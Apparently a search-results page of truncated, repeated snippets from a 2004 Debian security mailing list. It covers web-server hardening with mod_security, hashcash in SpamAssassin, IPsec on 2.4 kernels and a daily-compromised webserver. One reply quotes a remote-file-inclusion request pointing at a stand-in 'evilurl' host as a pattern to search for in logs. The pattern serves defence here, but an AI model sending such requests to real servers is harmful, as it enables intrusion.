On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
> > >
> > > Install some rules for it to harden your webserver, see if anything is
> > > flagged in the security log.
> >
> > other web server testing tools
> > http://www.linux-sec.net/Web/#Testing
>
> Has anyone actually used
On Wed, Jun 16, 2004 at 11:38:10AM -0400, Hubert Chan wrote:
tokens in order to get any effect from SpamAssassin. Other than using
zombies, I don't think spammers could afford to generate real tokens
for every recipient.
Well, since there are millions of vulnerable systems all over the 'net
th
On Tue, 15 Jun 2004, Alvin Oga wrote:
>
> hi ya
>
> On Wed, 16 Jun 2004, TiM wrote:
>
> >
> > Look at installing mod_security, http://modsecurity.org
> >
> > Install some rules for it to harden your webserver, see if anything is
> > flagged in the security log.
>
> other web server testing
On Wed, Jun 16, 2004 at 11:44:17AM -0500, Micah Anderson wrote:
> > >
> > > Install some rules for it to harden your webserver, see if anything is
> > > flagged in the security log.
> >
> > other web server testing tools
> > http://www.linux-sec.net/Web/#Testing
>
> Has anyone actually used
> "Daniel" == Daniel Pittman <[EMAIL PROTECTED]> writes:
Daniel> On 16 Jun 2004, Hubert Chan wrote:
>> SpamAssassin will check for hashcash in the future. Support is
>> already present in the development version of SpamAssassin.
Daniel> ...makes you wonder how long it will take before someon
On Wed, Jun 16, 2004 at 11:38:10AM -0400, Hubert Chan wrote:
tokens in order to get any effect from SpamAssassin. Other than using
zombies, I don't think spammers could afford to generate real tokens
for every recipient.
Well, since there are millions of vulnerable systems all over the 'net
that d
It should works even though i must admit i regulary release the package while
only testing with 2.6 based kernels (blame blame). I did howver tested
it some times ago on a 2.4.xx (cant remember) when Herbert decided to
take the ipsec backport. What's going wrong ?
J.
On Wed, Jun 16, 2004 at 12:49
On Tue, 15 Jun 2004, Alvin Oga wrote:
>
> hi ya
>
> On Wed, 16 Jun 2004, TiM wrote:
>
> >
> > Look at installing mod_security, http://modsecurity.org
> >
> > Install some rules for it to harden your webserver, see if anything is
> > flagged in the security log.
>
> other web server testing
> "Daniel" == Daniel Pittman <[EMAIL PROTECTED]> writes:
Daniel> On 16 Jun 2004, Hubert Chan wrote:
>> SpamAssassin will check for hashcash in the future. Support is
>> already present in the development version of SpamAssassin.
Daniel> ...makes you wonder how long it will take before someon
It should works even though i must admit i regulary release the package while
only testing with 2.6 based kernels (blame blame). I did howver tested
it some times ago on a 2.4.xx (cant remember) when Herbert decided to
take the ipsec backport. What's going wrong ?
J.
On Wed, Jun 16, 2004 at 12:49
Ross Tsolakidis wrote:
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.
I suspect cross site scripting. You should parse your logs and search
for requests like:
GET /~stupiduser/buggy-script.cgi?include=http://www.evilurl/
On Wed, 16 Jun 2004, Carlos L.M. wrote:
> Have anyone try to establish ipsec tunnels with
> debian sarge with kernel 2.4.26 ??? Is it possible to
> use 2.4.26 kernel with isakmpd without any patch?
I do it routinely with freeswan userspace and 2.4.26 with no patch (using
the backport of 2.6.x I
Hello,
Have anyone try to establish ipsec tunnels with
debian sarge with kernel 2.4.26 ??? Is it possible to
use 2.4.26 kernel with isakmpd without any patch?
Thank you very much.
__
Yahoo! lanza su nueva tec
Ross Tsolakidis wrote:
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.
I suspect cross site scripting. You should parse your logs and search
for requests like:
GET /~stupiduser/buggy-script.cgi?include=http://www.evilurl/
You could also try installing snoopy, which logs all commands executed by
users to auth.log. Then look for unusual commands executed by user
"www-data" if you suspect insecure PHP scripts etc.
Cheers,
Richard
--
__ _
|_) /| Richard Atterer | GnuPG key:
| \/¯| http://atterer.n
On Wed, Jun 16, 2004 at 11:46:05AM +1200, TiM wrote:
>
> Look at installing mod_security, http://modsecurity.org
>
> Install some rules for it to harden your webserver, see if anything is
> flagged in the security log.
Also notice that modsecurity provides a way to easily chroot your Apache
we
On Wed, 16 Jun 2004, Carlos L.M. wrote:
> Have anyone try to establish ipsec tunnels with
> debian sarge with kernel 2.4.26 ??? Is it possible to
> use 2.4.26 kernel with isakmpd without any patch?
I do it routinely with freeswan userspace and 2.4.26 with no patch (using
the backport of 2.6.x I
Hello,
Have anyone try to establish ipsec tunnels with
debian sarge with kernel 2.4.26 ??? Is it possible to
use 2.4.26 kernel with isakmpd without any patch?
Thank you very much.
__
Yahoo! lanza su nueva tec
You could also try installing snoopy, which logs all commands executed by
users to auth.log. Then look for unusual commands executed by user
"www-data" if you suspect insecure PHP scripts etc.
Cheers,
Richard
--
__ _
|_) /| Richard Atterer | GnuPG key:
| \/¯| http://atterer.n
On Wed, Jun 16, 2004 at 11:46:05AM +1200, TiM wrote:
>
> Look at installing mod_security, http://modsecurity.org
>
> Install some rules for it to harden your webserver, see if anything is
> flagged in the security log.
Also notice that modsecurity provides a way to easily chroot your Apache
we
On 16 Jun 2004, Hubert Chan wrote:
>> "Russell" == Russell Coker <[EMAIL PROTECTED]> writes:
> Russell> On Fri, 11 Jun 2004 22:34, Patrick Maheral <[EMAIL PROTECTED]> wrote:
[...]
> SpamAssassin will check for hashcash in the future. Support is already
> present in the development version of
> "Russell" == Russell Coker <[EMAIL PROTECTED]> writes:
Russell> On Fri, 11 Jun 2004 23:43, [EMAIL PROTECTED] (Rens Houben) wrote:
>> Why bother, when said windows machines will have perfectly good
>> signatures stored on them somewhere already?
Russell> Presumably the signature would be bas
> "Russell" == Russell Coker <[EMAIL PROTECTED]> writes:
Russell> On Fri, 11 Jun 2004 22:34, Patrick Maheral <[EMAIL PROTECTED]> wrote:
>> It seems that most people here don't like CR systems, and I'd have to
>> agree with that consensus.
>>
>> I'm just wondering what is the general feeling a
On 16 Jun 2004, Hubert Chan wrote:
>> "Russell" == Russell Coker <[EMAIL PROTECTED]> writes:
> Russell> On Fri, 11 Jun 2004 22:34, Patrick Maheral <[EMAIL PROTECTED]> wrote:
[...]
> SpamAssassin will check for hashcash in the future. Support is already
> present in the development version of
24 matches
Mail list logo
